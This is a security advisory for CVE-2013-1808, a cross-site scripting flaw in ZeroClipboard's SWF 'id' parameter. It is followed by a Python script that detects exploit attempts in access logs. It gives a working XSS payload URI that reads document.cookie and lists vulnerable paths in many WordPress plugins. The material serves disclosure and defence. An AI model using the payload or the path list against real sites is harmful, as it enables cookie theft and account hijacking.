ZeroClipboard 'ZeroClipboard10.swf' Cross Site Scripting Vulnerability
| Bugtraq ID: | 58257 |
| Class: | Input Validation Error |
| CVE: | CVE-2013-1808 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 02 2013 12:00AM |
| Updated: | Mar 19 2015 09:18AM |
| Credit: | MustLive |
| Vulnerable: | |
| Not Vulnerable: | |
Exploit / POC
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/wp-content/plugins/bp-code-snippets/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/buckets/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/click-to-copy-grab-box/lib/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/geshi-source-colorer/external/zeroclipboard/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/jaspreetchahals-coupons-lite/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/mobileview/admin/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/wp-clone-by-wp-academy/lib/js/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/thethe-layout-grid/style/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/zopim-live-chat/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/wp-link-to-us/js/ZeroClipboard.swf?id=[xss]
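Since every URI above targets the `id` parameter of a ZeroClipboard SWF, a defender can look for such requests in web server access logs. The following is an added example, not part of the original advisory; it assumes combined-format log lines and that legitimate `id` values are short alphanumeric identifiers, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs

# Matches ZeroClipboard.swf and ZeroClipboard10.swf, the two file names on this page.
SWF_NAME = re.compile(r"(?i)/zeroclipboard(?:10)?\.swf$")
# Assumption: legitimate callers pass a short identifier as the id value.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Client address and request target from a combined-format access log line.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Mar/2013:10:00:01 +0000] '
    '"GET /wp-content/plugins/buckets/js/ZeroClipboard.swf?id=1&width=80&height=20 HTTP/1.1" 200 1071',
    '203.0.113.9 - - [02/Mar/2013:10:00:05 +0000] '
    '"GET /js/ZeroClipboard.swf?id=%22))%7Dcatch(e)%7B%7D//&width&height HTTP/1.1" 200 1071',
    '192.0.2.44 - - [02/Mar/2013:10:00:09 +0000] '
    '"GET /static/ZeroClipboard10.swf?id=a%22b HTTP/1.1" 200 1071',
    '192.0.2.44 - - [02/Mar/2013:10:00:12 +0000] '
    '"GET /index.php?id=%22x HTTP/1.1" 200 512',
]


def suspicious_swf_requests(lines):
    """Return (client, path, decoded id) for ZeroClipboard SWF requests with an unsafe id."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a recognisable request line
        client, target = m.groups()
        path, _, query = target.partition("?")
        if not SWF_NAME.search(path):
            continue  # only the SWF named in this advisory is of interest
        # parse_qs percent-decodes each value before the allow-list check.
        for value in parse_qs(query).get("id", []):
            if not SAFE_ID.fullmatch(value):
                hits.append((client, path, value))
    return hits


if __name__ == "__main__":
    for client, path, value in suspicious_swf_requests(SAMPLE_LOG):
        print(f"{client} {path} id={value!r}")
```
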